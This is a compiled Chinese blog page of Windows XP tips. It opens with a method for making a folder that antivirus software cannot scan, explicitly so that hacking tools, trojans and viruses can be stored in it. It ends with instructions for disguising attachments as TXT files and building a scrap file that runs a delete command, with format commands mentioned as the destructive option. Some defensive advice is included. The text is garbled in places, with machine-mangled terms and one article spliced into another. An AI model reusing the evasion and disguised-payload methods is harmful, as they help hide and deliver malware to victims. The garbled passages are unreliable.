XP审核文件、文件夹之前，你必须启用组策略中“审核策略”的“审核对象访问”。否则，当你设置完文件、 文件夹审核时会返回一个错误消息，并且文件、文件夹都没有被审核。避开杀毒软件建立让它查不到的文件夹 2009-02-08 15:46:25 被43人转藏 | 小贴士:测试:你最真实的一面(很准哦) 避开杀毒软件建立让它查不到的文件夹 自从安装了杀毒软件后，每次只要打开存有黑客工具的文件夹，就会频繁弹出报警窗口，一失手按下“确定”后，辛苦积攒的程序便“随风而逝”了。几次下来，我的“存粮”已几乎消失怠尽，看来需要想想办法，搞一个杀毒软件检测不到的文件夹才行。 一、原理简单 方法明确 众所周知，在Windows中“\”符号是路径的分隔符，比如“C:\Windows\”的意思是指C分区中的Windows文件夹，而“C:\Windows\System.exe”的意思是C分区中的Windows文件夹中的System.exe文件。那么如果文件名中有“\”符号会怎么样呢?假如“S\”是一个文件夹的名字，这个文件夹位于“F:\”，它的路径就是“F:\S\”，当我们试图访问时，Windows会错误的认为我们要打开的文件是F分区下的名为“S”的文件夹，而非“s\”文件夹，这样Windows就无法准确打开该文件夹，并且会返回一个错误信息，因为以上路径并不存在。 二、建立目录 饶道而行 知道了原理，那么就在Windows XP下简单的创建“S\”文件夹吧。咦?怎么 系统会提示“文件名不能包含‘\’符号”。看来微软早已想到这一点了，看来只好采取其它办法来创建这个“特殊”文件夹了。 在“运行”栏中执行“cmd”命令，打开命令提示符窗口，在其中输入“c:\”命令(不含引号，下同)，接着在“c:\”后输入“mkdir s..\”，按回车键。现在，打开资源管理器，可看到C盘下建立了一个名为“s.”的文件夹，不过这个文件夹既不能打开也不能删除。不能打开是因它的实际路径是“c:\s..\”(由于是我们自己创建的，所以可以确定它的实际路径)，但在系统资源管理器中，它的文件夹名变成了“s.”，这样当试图打开它时，系统实际上尝试打开的是“c:\s.\”，这当然是不能打开的。由于系统认为该文件夹并不存在，所以会报错，不能删除也是基于此原因。 如果在c:\后键入mkdir s...\按回车键，在资源管理器中会看到名为“s..”的文件夹，而这个文件夹可以打开但无法删除。但实际上这个文件夹是无效的，在Windows XP下拷贝任意一个文件到这个文件夹，再打开时便会发现其中什么也没有。 虽然新建的“s..\”文件夹不能打开也不能删除，但它却不妨碍我们向其中拷贝文件。不过需要注意的是，一旦对这个文件夹进行了操作，便会在当前路径下多出一个名为“s”的文件夹，此时这两个文件夹便都可以正常打开了，但里面的内容均为空。这时只要删除其中任意一个文件夹，留下的文件夹便又无法在资源管理器中，进行正常的打开或删除操作了。 既然这样的文件夹在Windows下不会被删除，那么就大可放心的将黑客工具或重要文件保存其中了。经过测试，在其中即使存放木马甚至病毒程序，也不会被杀毒软件查杀到了。 虽然这类文件夹在资源管理器中不能正常打开，但可以通过“运行”栏进行开启，前提是知道该文件夹的真实路径。比如本例便可在“运行”栏中键入“c:\s..\”后，按回车键来打开这个文件夹。 三、删除操作 轻松自如 最后再来说说这类文件夹的删除方法。如果文件夹是空的，可在命令提示符窗口中输入“c:\”，然后再键入“rmdir s..\”命令，按回车执行后即可删除。如果文件夹中已存放了文件，则可键入“rmdir s..\/s”命令，按回车键后，提示“s..\, 是否确认(Y/N)?”时，键入“y”键删除该文件夹即可。 PS、巧妙设置 将文件隐藏起来确保安全 我们在使用电脑的时候有很多重要的文件是不希望别人看到的，为了把这些最高机密隐藏起来，大家也可谓费尽心机。单纯的修改了隐藏属性，往往不能达到预期的效果，秘密轻易就被揭穿的滋味实在是不好受。其实，在Windows系统中除了更改属性以外，还有几种更加巧妙的隐藏文件和文件夹的方法。 一、瞒天过海 这个方法主要是针对一些不想让别人看见的文件，首先修改想隐藏文件的扩展名，将扩展名修改成在系统中没有的类型，比如*.ffh *.jjk 等等，由于这些文件没有跟系统中的任何应用程序相链接，所以这些打不开或者是无法运行的程序是不会轻易引人注意的。不过需要提醒的是，再修改完成后自己一定要记住哪些是我们修改的，不然一不小心删除了可就麻烦了。 二、借鸡下蛋 很多朋友大概都知道在Windows目录中又一个用来专门存储字体的文件夹FONTS目录，这个目录下面有一个DESKTOP.INI文件，如果看不到，可以用查找功能来找到此文件。找到文件后，我们进入DOS环境，将FONTS目录中的DESKTOP.INI文件拷贝到任何一个我们想要隐藏的文件夹中，此时我们会发现这个文件夹中的文件突然不见了，而且所有的内容都成为了字体文件，这个目录中的一切都似乎与c:\windows\FONTS中的相同。这时用户的文件已经成功的隐藏了。如果想找到隐藏的文件命也很容易，只需要用右键点击文件夹，然后选择查找功能，找到DESKTOP.INI这个文件，删除即可。 三、废物利用 这个方法比较隐蔽一些，它主要是利用Windows系统自身的回收站来达到隐藏的目的。当然，可不是单纯的将文件或者文件夹拖到回收站中隐藏，而且与上面的方法不通的是，即便启动显示所有文件功能和查找功能都无法看到我们索引隐藏的东东。首先进入DOS状态，然后进入到回收站的文件夹，进入后使用 dir/a 这个命令找到DESKTOP.INI文件，然后通过Attrib -s -h -r desktop.ini这个命令将文件的属性去掉，再将此文件复制到任何一个我们想隐藏起来的文件夹中，这时会发现，想隐藏的文件夹此刻已经悄悄的变成回收站了。而且不会影响计算机原有回收站的使用，即使清空回收站也不会影响里面的文件，当然，再想查看的时候也许要麻烦一些，首先进入 DOS状态，然后进入隐藏的文件夹，并把文件夹中的DESKTOP.INI文件删除，此时原来的文件又回显出庐山真面目来了。 四、巧立名目 首先进入主分区下的windows目录，然后找到Local settings这个文件夹，再进入到Temporary Internet Files 文件夹，找到文件夹中的DESKTOP.INI文件，再将其拷贝出来。(需要注意的是这个文件通常使看不到的，但是可以在Temporary Internet Files 文件夹中点击右键中的查找能，讲这个文件查找到。)拷贝出这个文件后，将其发在想要隐藏的文件夹中，此时这个文件夹中的文件就变成Temporary Internet Files 文件夹中的内容了，而原有的文件就被隐藏起来了。当然使用这种方法后，会让想隐藏的目录变成IE的磁盘缓存，会增加一些小小的垃圾文件，但是与此同时用户IE的浏览速度也会有一些改善，是不是 感觉更快了哪:可如果你不想要这个功能也可以，你可以把他设置为只读属性就可以了。如果想要找回隐藏的文件，只需要继续在所隐藏的文件夹中点击右键，查找到DESKTOP.INI文件，删除即可。好了，以上就是一些利用Windows系统自身的一些功能达到隐藏文件的目的的方法，记住所想要真正藏的东西，就必须让一百个江洋大盗也无法找到。 Windows目录安全性提升 2009-02-08 15:45:51 被23人转藏 | 小贴士:测试:你对别人的重要性和利用率 Windows目录安全性提升 Windows系统目录是Windows操作系统的重要目录，当我们访问这个目录时，系统会提示你这个目录的重要性，如果需要进入，只需要单击“显示文件”就可以大摇大摆地走进去了。如果我们给Windows目录增加一个进入口令，只有那些口令输入正确的人才能进入，这样，你的Windows目录不是安全多了，而且一些不愿让别人看到的文档也可以放到里面。 给Windows目录加口令，我们需要 借助Windows目录中一个特殊文件:超文本模板文件folder.htt。另外我们再编写一个HTML文档用来进行口令输入错误时的提示。 下面，我们先来修改一下 folder.htt，用记事本打开Windows目录中的folder.htt文档(注意它是一个隐藏文件，如果你在Windows目录中找不到它，可以在我的电脑窗口中单击“查看”菜单中的“文件夹选项...”，再单击“查看”标签，在高级设置中选中“显示所有文件”就可以了。)，在文档内容最后的语句前面加入如下 VBSCRIPT代码: function kouling() dim pass pass=Prompt("对不起，这是重要的系统 目录，请您正确输入管理口令才能进入: ","") if pass="abc" then dedecms.com else Alert "对不起，您的口令错误～" Navigate "file://C:\Program Files\error.html" end if end function kouling() 然后保存一下文件。 先不要测试， 各位看到代码中的Navigate "file://C:\Program Files\error.html"一句了吗，我们还需要建立一个error.html文档，用以进行错误提示。下面是这个文档最简单的代码，其核心内容是放置一个可以返回C盘根目录的按钮: 出错了! 对不起，您无权访问Windows系统目录! 岭瑜工作室 将这段代码保存为error.html文档，并存放于C:\Program Files\下。 好了，让我们测试一下吧～当你打开C盘欲进入Windows目录时，首先会弹出一个让你输入口令的对话框，输入口令abc(你也可以在folder.htt中将pass变量改为其他密码)，才可以进入。如果不输入或输入错误，则直接打开页面“error.html判断Windows是否被流氓侵入 2009-02-08 15:45:17 被32人转藏 | 小贴士:收藏帖子也能赚钱?太好了! 江湖规矩“人不犯我，我不犯人”，但是流氓软件并不遵守这条规矩，它们唯恐无法入侵，一旦有机会，你便被其缠身。流氓软件的龙头大哥--3721就采取了“无孔不入”的手段，不管你是在安装软件、浏览网站时它都会在用户不知情的情况下伺机入驻电脑中。那么，如何才能知道自己的电脑是否招流氓了呢? 1.根据表象初步判断 医生判断一个病人是否感冒了，可以从是否流鼻涕、是否鼻塞、是否附带咳嗽等表象进行判断，而要想判断系统是否感染了流氓软件，也可以从表象来判断。当系统感染了流氓软件后一般有以下几种可疑迹象可以通过感觉来判断: ? 系统运行速度越来越慢 安装了病毒防火墙，系统中最近也并没安装什么软件，但是系统的运行速度一天比一天慢，而杀毒软件也没有进行病毒警告，这种情况下，十之八九中了流氓软件的招。 ? 部分软件，特别是浏览器设置被强行修改 由于流氓软件表面上是为用户提供了一些有用的功能，但实质上，它们是为了达到宣传自己的网站、自己的产品等目的。因此，流氓软件一旦成功入侵电脑，它们便会在一些软件上提供相应的插件工具栏，以浏览器类软件居多，在浏览器家族中又以IE最受流氓软件欢迎。当发现日常使用的软件的工具栏被增加了一些项目或是像浏览器的设置被修改了，也足可以说明系统中可能感染了流氓软件。 ? 自动弹出广告窗口 在正常使用电脑过程中，时而不时地自动弹出一些广告窗口，关闭后隔一断时间又会出现，做广告本是流氓软件的一个目的，因此，当你频繁地看到自动弹出的广告时，系统也有可能感染了流氓软件。 ? 自动打开网站 与自动弹出广告类似，有些流氓软件更猖狂，会自动启动浏览器并打开一些网站，如果你遇到了这种情况也说明系统有招流氓软件的迹象了。 2.利用工具检测 根据表象判断只是精略地推断是否感染流氓软件，就像医生给病毒看病一样，先是通过询问等方式来大致地判断病情，最后还会使用相关的医疗机器进行确诊。判断系统是否招流氓软件也应该通过工具来“确诊”。 ? 使用系统的任务管理器 当系统感染了流氓软件后，只要流氓软件正在运行的话，一般都是可以通过系统的任务管理器来寻觅其踪影: 按下“Ctrl+Shift+Esc”打开任务管理器窗口，再单击“进程”选项卡，在进程列表中将会看到流氓软件的踪影了。不过，这种方法只适合那些对电脑系统比较熟悉并对流氓软件对应的进程有所了解的朋友们采用。 ? 使用专用检测工具 使用任务管理器这个系统自带的工具来检测流氓软件对用户的要求相对高些，为此，笔者推荐大多数用户使用专业的流氓软件检测工具来检测，这样既直观，操作也会方便很多。 现在检测流氓软件的工具有不少，例如:超级兔子、Upiea、恶意软件清理助手、360安全卫士、Windows Defender等。 ”给以提示，单击页面中的返回按钮又会返回到C盘根目录了。 Windows操作系统使用记录自动清除技巧 2009-02-08 15:44:48 被61人转藏 | 小贴士:测试:你最真实的一面(很准哦) 使用Windows久了，系统就会出现垃圾，或者我们不想让别个看到我们的电脑操作记录，那么用自动清理是最好的方法，下面就给大家讲一些这方面的技巧。 启用过时资源记录自动清理 1. 打开 DNS。 2.在控制台树中，右键单击适当的 DNS 服务器，然后单击“属性”。 3. 单击“高级”选项卡。 4. 选中“启用过时资源记录自动清理”复选框。 5. 要调整“清理周期”，请在下拉列表中选择以小时或天为单位的时间间隔，然后在文本框中键入一个数。 注意 要执行该过程，您必须是本地计算机上 Administrators 组的成员，或者您必须被委派了适当的权限。如果计算机已加入某个域，则 Domain Admins 组的成员可能会执行该过程。作为安全性最佳操作，请考虑使用“运行方式”执行此过程。详细信息，请参阅默认本地组、默认组以及使用“运行方式”。 要打开“DNS”，请依次单击“开始”和“控制面板”，双击“管理工具”，然后双击“DNS”。 让XP关机时自动清理页面文件 使用电脑时，一些Word文档或者打开的网页等就会被载入到内存，而为了节省出内存空间，Windows会把不同的文件放到系统的页面文件中，页面文件就象一个临时仓库。微软提供了一种方法可以在关闭Windows XP时自动清理页面文件，默认情况下这一功能是关闭的，下面我们将介绍如何启用这一功能。不过要注意的是，启用这一功能后，因为要执行清理操作，所以关机时间将会变长。 操作步骤 1.单击“开始”菜单， 单击“运行”，在对话框中输入“Regedit”，然后单击“确定”，运行“注册表编辑器”。如果不熟悉注册表知识，可以先看一下这里。 2.浏览到“HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSession ManagerMemory Management”，然后在右边的列表中双击“ClearPageFileAtShutdown”。 3.在弹出的“编辑DWORD”值对话框中，选择基数为十六进制，并将左边的“数值数据”改为1，这样就启用了关机时自动清理页面文件功能。 4.重新启动计算机，使修改生效 清除IE临时文件 Windows或应用程序在运行时通常都会产生临时文件，虽然部分临时文件在Windows或应用程序正常退出时会被自动删除，但由于Windows的不稳定，或者是因为程序功能的不完善，经常会有临时文件成为“漏网之鱼”。这样，随着时间的推移，临时文件逐渐堆积，不仅占用了用户宝贵的硬盘空间，而且也极大地影响了系统的运行效率。下面，笔者就如何有效地删除临时文件给出两种方法，希望能给大家一些启示。 方法一:打开“开始”菜单，选择“搜索?文件或文件夹”，然后在对话框的“要搜索的文件或文件夹名为”栏内输入“*.tmp”(tmp为临时文件的后缀名)，在对话框的“搜索范围”栏的下拉列表中选择“本机硬盘驱动器”，单击“搜索选项”，勾选“高级选项”及其下的“搜索子文件夹”项，最后单击“立即搜索”按钮。待搜索完毕后，切换至“搜索结果”页面，按“Ctrl+A”组合键或选择工具栏菜单的“编辑?全部选定”项选择所有的文件，按“Del”键或选择工具栏菜单的“文件?删除”项，即可一次性删除用户计算机上所有以.tmp为后缀的临时文件。 方法二:为了加快访问速度，IE会将曾经浏览过的网页等内容存放在Temporary Internet Files文件夹中。如果我们不希望他人从这里窥视自己的秘密，可以利用关机脚本让系统自动在关机前进行清理，这里介绍一下具体的操作(以Windows XP为例)。 在“C:\Windows\System32\GroupPolicy\Machine\Scripts\Shutdown”目录下，新建一个批处理文件Cleanup.bat，内容可根据需要编写。清除IE临时文件的命令为“DEL/Q/S "C:\Documents and Settings\\Local Settings\Temporary Internet Files"”。其中参数/Q表示使用安静模式，即删除全局通配符时，不要求确认;参数/S表示从所有子目录删除文件。 单击“开始” “运行”，在运行命令框中输入“Gpedit.msc”，打开组策略窗口。在左侧的控制台树窗格中，依次展开“计算机配置” “Windows设置” “脚本(启动/关机)”节点，双击右侧详细资料窗格中的“关机”项目，在弹出的“关机属性”对话框中点击“添加”按钮,将Cleanup.bat添加为新的计算机关机脚本。设置完成后，退出组策略窗口，重新启动计算机即可。 方法三:打开“开始”菜单，选择“程序?MS-DOS方式”，用纯文本编辑器编辑Autoexec.bat文件(即在DOS方式下运行命令:“edit autoexec.exe”)，在这个自动运行的批处理文件中，环境变量temp和tmp定义了Windows运行过程中临时文件的存储位置，默认位置为“\windows\temp”文件夹)。 原Autoexec.bat文件为: SET COMSPEC=C:\WINDOWS\COMMAND.COM SET windir=C:\WINDOWS SET winbootdir=C:\WINDOWS SET PATH=C:\WINDOWS;C:\WINDOWS\COMMAND SET PROMPT=$p$g SET TEMP=c:\windows\temp SET TMP=c:\windows\temp 经编辑后的Autoexec.bat文件为: SET COMSPEC=C:\WINDOWS\COMMAND.COM SET windir=C:\WINDOWS SET winbootdir=C:\WINDOWS SET PATH=C:\WINDOWS;C:\WINDOWS\COMMAND SET PROMPT=$p$g deltree /Y x:\temp(删除临时文件文件夹，其中x为该文件夹所在的驱动器) md x:\temp(创建临时文件文件夹,X为你的盘符) SET TEMP=d:\temp SET TMP=d:\temp 文件编辑完毕后存盘即可。经过以上的设定，用户以后每次启动计算机都会自动删除临时文件。 清除IE地址栏记录 前面清除的IE历史记录还不够彻底，当我们在IE地址栏中输入与曾经输入过的URL一样的字符串时，仍会显示出相关的网址记录。要想清除这些记录，则必须将注册表[HKEY CURRENT USER\Software\Microsoft\Internet Explorer\TypedURLs]分支下的键值全部删除。 用记事本创建一个脚本文件，脚本内容如下: Dim WSHShell Set WSHShell = WScript.CreateObject("WScript.Shell") WSHShell.RegWrite "HKCU\Software\Microsoft\Internet Explorer\TypedURLs\", ""WSHShell.RegDelete "HKCU\Software\Microsoft\Internet Explorer\TypedURLs\"上述脚本共有四句:第一句定义一个变量WSHShell，第二句创建一个对象，第三句写入注册表，如果注册表中不存在该项，执行脚本时会出现错误提示。输入以上内容后将其保存为Cleanup.vbs。注意，后缀名一定要是vbs，这样才能保证脚本的正常执行。 编写完成后，在组策略窗口中依次展开“用户配置” “Windows设置” “脚本(登录/注销)”节点，双击右侧窗格中的“注销”项目，在弹出的“注销属性”对话框中点击“添加”按钮,将Cleanup.vbs添加为注销脚本。这样，当计算机注销或关机时就会自动清除IE地址栏记录。 前面介绍了利用关机和注销脚本自动清理上网痕迹的方法，如果你还有其它的项目需要清理，也可以参照上述方法。这里要提醒读者的是，利用脚本实现自动清理前，最好先用手工方式彻底清理一次。 清除IE历史记录 清除IE历史记录通常的方法是“Internet选项” “常规” “清除历史记录”。不过，我们同样可以利用关机脚本来实现自动清理。在前面建立的Cleanup.bat批处理文件中添加一条命令“DEL/Q/S "C:\Documents and Settings\\Local Settings\History"”即可。 查出Windows XP中未“签名文件”的来源 2009-02-08 15:44:14 被21人转藏 | 小贴士:测试:你在别人眼中的真相，很真实～ 在Windows XP中，有很多软件(或驱动)都是没有经过“签名”的(即微软的“数字签名”)。有的软件没有“签名”不会影响系统正常运行，但是有的则不行，时常会引起一些未知错误。今天我就教给大家如何查看文件是否是经过“签名”的方法，以方便系统在出现错误时，好判断是由哪些程序引起的问题。 查询哪些文件是否经过签名并不需要借助第三方软件，利用Windows XP自带的验证工具“Sigverif”就可以查询到。 单击“开始”?“运行”，在打开的对话框中输入“sigverif”，单击“确定”按钮后弹出“文件签名验证”。 你可以直接点击“开始”按钮进行查询，但是这么做会使得查询时间比较长。我们可以给它指定查询范围，以缩短查询时间。单击“高级”按钮，弹出“高级文件签名验证设置”对话框，在这个对话框中点选“查找其他未经过数字签名的文件”，然后在“扫描该文件类型”中选择你要扫描的文件后缀类型，设置完毕后，单击“确定”按钮，程序即返回到界面。 提示: 界面中进行设置时，你可以将文件范围设定在 C:\Windows\System32\Drivers目录下，这样更能缩短查询时间。 在返回到界面后，单击“开始”按钮，程序将进入到查询状态。稍等一会，系统即给出查询结果。 在系统给出的查询结果中，你会发现所有已签名和未签名的驱动程序列表都是位于 %Windir% 文件夹(通常是Winnt或Windows)内的Sigverif.txt文件中，并且所有未经签名的驱动程序都会被标记为“未签名”(Unsigned)。在确定了哪些文件没有签名的之后，你可以将它们备份到其它地方，然后删除原目录中的文 件，一旦系统提示异常，你再还原回来就可以了。 WinXP空间:文件的属性也玩“花样” 2009-02-08 15:43:42 被27人转藏 | 小贴士:测试:你究竟是个什么样子的人, 在Windows XP中，使用鼠标右键点击任何文件，都会在菜单中出现一个“属性”命令，对此大家可是再熟悉不过了。通过属性命令，可获知文件容量的大小、进行共享设置等常用操作。不过今天我们要说的，可不仅仅这么简单。 保持IE窗口最大化 很多朋友在打开IE浏览器时，其页面窗口就默认为最小化状态，只能手动将它进行最大化操作，麻烦不已。其实借助IE快捷方式的“属性”，就可使IE打开时始终为最大化。 删除桌面上的IE图标，再为IE创建一个快捷方式。右击新建的快捷图标， 在弹出菜单中选择“属性”命令，打开属性设置对话框。切换到“快捷方式”选项卡，在“运行方式”选项栏中选择“最大化”项。最后点击“确定”按钮，再双击这个IE快捷方式，就可看到打开的IE窗口已是最大化状态了。 “揪出”隐藏的自解压木马 下载了许多自解压格式的文件，在运行前，你是否考虑过它们其中包括着木马呢,要是果真如此，当文件自解压时，木马程序也将自动运行。所以为安全起见，还是先查看一下文件属性，检查是否有木马为上策。 右击exe格式的自解压文件包，在弹出的属性对话框中选择“注释”选项卡，在中间的注释窗口有提示:“下面的注释包含自解压脚本命令”。如果注释内容中的“Setup=”语句后有可执行的文件名，那么就可断定这个解压文件在进行自解压操作时，将执行指定的程序，目的非常可疑。 让文件属性更“清晰” 硬盘中某些文件是重要的系统文件，有些是隐藏文件或只读文件，有没有快捷的方法来更清楚的了解所有文件的属性呢, 打开资源管理器，点击菜单“查看”?“选择详细信息”，在打开的详细信息设置对话框中，选择“属性”项目名，点击右边的“显示”按钮，再点击“确定”按钮关闭对话框。返回资源管理器，再点击菜单“查看”?“详细信息”命令，可看到文件以信息列表的方式进行排列显示了。而在信息栏中多出了一项“属性”，其中“A”表示“存档文件”属性，“S”表示“系统”文件属性，“H”则表示“隐藏”文件属性，“R”表示“只读”文件属性，所有文件均可一目了然。 降低资源占用率 系统资源不够用，想节约程序运行时所耗费的资源,这很好办，右击程序文件名，选择“属性”命令，在打开窗口中选择“兼容性”选项卡。在“显示设置”栏内可设置程序以256色及640×480的分辨率运行，这样就可降低色深与分辨率所占用的资源。另外，可勾选“禁用视觉样式”项，禁用Windows XP中的各种视觉效果，有效降低CPU的占用率，尤其在运行大型办公软件时，速度可以加上很多。 使用文档属性“透视”文本内容 鼠标悬停在Word文档上时，可显示出该文档的摘要信息，这样不必打开文档就可获知其中的大概内容。那么普通文本文件想获得同样的效果，该怎么做呢,如果你使用的是NTFS磁盘格式，这个问题就可以迎刃而解了。 在NTFS格式的分区中，右键点击文本文件，选择“属性”命令。在打开的 属性设置窗口中，选择“摘要”选项卡。在这里可输入文本的标题、主题、内容及作者等多项信息，在“备注”栏中还可输入文本的大概内容。关闭对话框，点击菜单“查看”?“选择详细信息”，在打开的详细信息设置对话框中，勾选“备注”项。确定后，将鼠标移到之前修改的文本文件上，可看到设置内容已全部显示出来了。 隐藏“属性”禁用光驱 在资源管理器中，右击光驱图标，可查看到光盘信息，并设置自动播放等项目。如果你多加留意，会发现其中还有一个隐藏的属性内容，它可让光驱禁用。 打开光驱的“属性”设置窗口，切换到“硬件”选项卡。在“所有磁盘驱动器”列表中选择光驱，点击下面的“属性”按钮，打开“隐藏”的属性对话框。选择“常规”选项卡，在“设备用法”下拉列表中选择“不要使用这个设备”命令。“确定”后，再打开资源管理器，可看到光驱图标已经“消失”得无影无踪， 不明所以的人还以为光驱坏掉了。 三类危险的TXT文件 2009-02-08 15:43:11 被38人转藏 | 小贴士:测测你是不是娱乐八卦狂人? 假如您收到的邮件附件中有一个看起来是这样的文件Q 放送.txt，您是不是认为它肯定是纯文本文件?我要告诉您，不一定!它的实际文件名可以是QQ 放送.txt{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}.{3050F4D8-98B5-11CF-BB82 -00AA00BDCE0B}在注册表里是HTML文件关联的意思。但是存成文件名的时候它并 不会显现出来，您看到的就是个.txt文件，这个文件实际上等同于QQ 放送.txt.html。那么直接打开这个文件为什么有危险呢?请看如果这个文件的内容如下: 您可能以为它会调用记事本来运行，可是如果您双击它，结果它却调用了HTML来运行，并且自动在后台开始格式化D盘，同时显示“Windows正在配置系统。Plase不打断这个过程。”这样一个对话框来欺骗您。您看随意打开附件中的.txt的危险够大了吧? 欺骗实现原理:当您双击这个伪装起来的.txt时候，由于真正文件扩展名是.{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}，也就是.html文件，于是就会以html文件的形式运行，这是它能运行起来的先决条件。 文件内容中的第2和第 3行是它能够产生破坏作用的关键所在。其中第3 行是破坏行动的执行者，在其中可以加载带有破坏性质的命令。那么第 2行又是干什么的呢?您可能已经注意到了第 2行里的“Ws cript”，对!就是它导演了全幕，它是幕后主谋! Ws cript全称Windows s cripting主人，它是Win98中新加进的功能，是一种批次语言/自动执行工具——它所对应的程序“Ws cript.exe”是一个脚本语言解释器，位于c:\WINDOWS下，正是它使得脚本可以被执行，就象执行批处理一样。在Windowss cripting主人脚本环境里，预定义了一些对象，通过它自带的几个内置对象，可以实现获取环境变量、创建快捷方式、加载程序、读写注册表等功能。 识别及防范方法: ?这种带有欺骗性质的.txt文件显示出来的并不是文本文件的图标，它显示的是未定义文件类型的标志，这是区分它与正常TXT文件的最好方法。 ?识别的另一个办法是在“按网页方式”查看时在“我的电脑”左面会显示出其文件名全称(如图 1)，此时可以看到它不是真正的TXT文件。问题是很多初学者经验不够，老手也可能因为没留意而打开它，在这里再次提醒您，注意您收到的邮件中附件的文件名，不仅要看显示出来的扩展名，还要注意其实际显示的图标是什么。 ?对于附件中别人发来的看起来是TXT的文件，可以将它下载后用鼠标右键选择“用记事本打开”，这样看会很安全。 二。 恶意碎片文件 另一类可怕的TXT文件是一种在Windows中被称作“碎片对象”(扩展名为“嘘”)的文件，它一般被伪装成文本文件通过电子邮件附件来传播，比方说，这个样子Q号码放送.txt.shs，由于真正地后缀名“嘘”不会显示出来，如果在该文件中含有诸如“形式”之类的命令将非常可怕!不仅如此，以下四点原因也是其有一定危害性的原因: ?碎片对象文件的缺省图标是一个和记事本文件图标相类似的图标，很容易会被误认为是一些文本的文档，用户对它的警惕心理准备不足。 ?在Windows的默认状态下，“碎片对象”文件的扩展名(“.嘘”)是隐藏的，即使你在“资源管理器”?“工具”?“文件夹选项”?“查看”中，把“隐藏已知文件类型的扩展名”前面的“?”去掉，“.嘘”也还是隐藏的，这是因为Windows支持双重扩展名，如“QQ号码放送.txt.shs”显示出来的名称永远是“QQ号码放送.txt”。 ?即使有疑心，你用任何杀毒软件都不会找到这个文件的一点问题，因为这个文件本身就没有病毒，也不是可执行的，而且还是系统文件。你会怀疑这样的 文件吗? ?这种嘘附件病毒制造起来非常容易，5分钟就可以学会，也不需要编程知识(格式化C盘的命令:“形式c:”大家都知道吧^ _ ^)。 1、 具体实例 那么，碎片对象到底对用户的计算机会造成什么威胁呢?我们一起来作个测试就明白了。以下测试环境是在Windows 2000服务器中文版上进行的。我们先在硬盘上创建一个测试用的文件test.txt(我创建的位置是D:\test.txt)，然后我们来制作一个能删除这个测试文件的碎片对象文件。 ?先运行一个对象包装程序(packager.exe)，我的Win2000服务者安装在/winnt/system32下。 ?新建一个文件后，打开菜单“文件”?“导入”，这时会弹出一个文件对话框，让你选择一个文件。不用考虑，随便选择一个文件就可以了。 ?然后打开“编辑”?“命令行”，在弹出的命令行输入对话框中输入“cmd.exe /c del d:\test.txt”，点“确定”。 ?然后，在菜单中选择“编辑”?“复制数据包”。 ?接着，随便在硬盘上找个地方，我就直接在桌面上了。在桌面上点击鼠标右键，在弹出菜单中选择“粘贴”，这时我们可以看到在桌面创建了一个碎片对象文件。 现在我们可以双击一下这个文件，CMD窗口一闪而过后，再到D盘看看，测试文件D:\test.txt已经被删除了!现在你该知道了，当时在对象包装中输入地命令被执行了。好危险啊，如果这条命令是要删除系统中的一个重要文件，或者是格式化命令形式之类的危险命令，那该有多么的可怕! 下面让我们一起来看看这个“隐身杀手”的真正面目吧! 2、 技术原理 依照微软的解释，嘘文件是一类特殊的对象链接与嵌入(对象链接与嵌入，对象连接和嵌入)对象，可以由词文档或优秀电子表格创建。通过选择文档中文本或图像的一块区域，然后拖放该区域到桌面上的某处，就可以创建一个Windows碎片对象，或称为嘘文件(此文件是不可读文件)。但是你可以用任何其它你想要的文件名重新命名嘘文件，或者拖放嘘对象到另一个文档(同样地，你可以剪切和粘贴)。 也就是说，我们所输入的命令作为对象链接与嵌入对象嵌入到对象包装程序 新建的文件中了， 而微软为了能方便的将嵌入到文件的对象进行复制，使用了一种技术壳废料宾语(简称嘘)，就是说，当你在不同文件间复制对象时，Windows是将对象包装成一个碎片对象来进行复制的。因此，一旦我们不是在文件间进行复制粘贴，而是直接将碎片对象粘贴到硬盘上，就会产生一个.嘘文件。这个碎片对象文件保存了原来对象的所具备的功能，原来对象包含的命令同样会被解析执行，这正是其可怕这处!3、防范方法 (1)“野蛮”法 嘘文件既然不是可执行文件，当然需要其他的程序来解析执行了，我们去掉解析执行的关联就可以简单防止这种文件中潜伏的威胁了。 运行注册表编辑器regedit.exe，在HKEY_CLASSES_ROOT\.shs主键下，将默认值ShellScrap删除，现在双击.嘘文件，看，不会执行了吧?弹出了一个对话框，让我们选择打开.嘘文件需要的程序，此时你选择“记事本”程序看就非常安全了。 更彻底一点的办法是将HKEY_CLASSES_ROOT\ShellScrap\shell\open\command下的打开.嘘文件的关联完全去掉，现在双击.嘘文件，连选择运行程序的对话框也不出现了，它会直接要求在控制面板重建文件关联。 (2)“文明”法 ?在注册表编辑器HEY_CLASSES_ROOT\ShellScrap键下，有一个键值“NeverShowExt”，它是导致“.嘘”文件扩展名无法显示的罪魁祸首。删除这个键值，你就可以看到“.嘘”扩展名了。 ?更换“碎片对象”文件的默认图标。由于碎片对象文件的默认图标与文本文件图标非常相似，容易麻痹人，所以我们要更换它的图标。打开资源管理器，选中“查看”菜单下的“文件夹选框”，在弹出的对话框中选择“文件类型”标签，在“已注册的文件类型”下找到“碎片对象”。单击右上角“编辑”按钮，在打开的“编辑文件类型” 对话框中单击上边的“更改图标”按钮。打开C:\WINDOWS\SYSTEM\Pifmgr.dll，从出现的图标中选一个作为“.嘘”文件的新图标即可。 (3)更多防治手段 ?如果是病毒文件隐藏了其真实扩展名“嘘”，而你在反病毒软件中设置成扫描指定程序文件、而不是扫描所有文件(如只扫描可执行文件)，那么反病毒软件是无法发现病毒的，所以请在反病毒软件的指定程序文件中加入“.嘘”文件的扫描。各种防病毒软件的设置大同小异，比较简单，请大家自己进行设置。 ?禁止“碎片对象”文件及“指向文档的快捷方式”文件。 三。改头换面的视野邮件附件 除了上面所说的两类危险的“TXT”文件，还存在另一种危险的“TXT”文件 ——改头换面的视野邮件附件!即一个看起来是TXT的文件其实是个EXE文件!下面我以OutLook2000简体中文版为例进行详细说明。 1. 开启OutLook2000，新建一个邮件，选择菜单栏中的“格式”?“带格式文本”，在邮件正文点击一下鼠标左键，选择菜单“插入”?“对象”，点击“由文件创建”?“浏览”，选择Windows目录下的notepad.exe，点击“确定”，在新邮件的主体部分出现notepad.exe及其图标。 2. 